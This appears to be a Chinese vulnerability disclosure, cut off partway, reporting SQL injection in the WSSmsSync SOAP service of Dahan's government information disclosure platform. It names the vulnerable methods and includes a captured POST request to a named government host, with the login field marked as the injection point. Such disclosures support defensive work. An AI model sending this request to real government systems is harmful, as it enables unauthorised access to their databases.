大汉政府信息公开多处SQL注入(附100个案例)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大汉政府信息公开多处SQL注入(附100个案例) ### 详细说明: 同样webservice漏洞,漏洞存在于 /xxgk/services/WSSmsSync?wsdl WSSmsSync服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在,如 isBase64 wsSyncGetInfos wsSyncGetInfos setStrAppId setBase64 上述方法的多个参数均存在漏洞,这里随便选取一个方法(wsSyncGetInfos)进行测试 用WSockExpert v0.7抓包,并保存为wooyun.txt ``` POST /xxgk/services/WSSmsSync?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.yj.gov.cn Connection: Close User-Agent: google robots <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms"> <soapenv:Header/> <soapenv:Body> <rec:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <strLoginId xsi:type="xsd:string">1*</strLoginId> <strPwd xsi:type="xsd:string">1</strPwd> <beginTime xsi:type="xsd:string">1</beginTime> <endTime...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息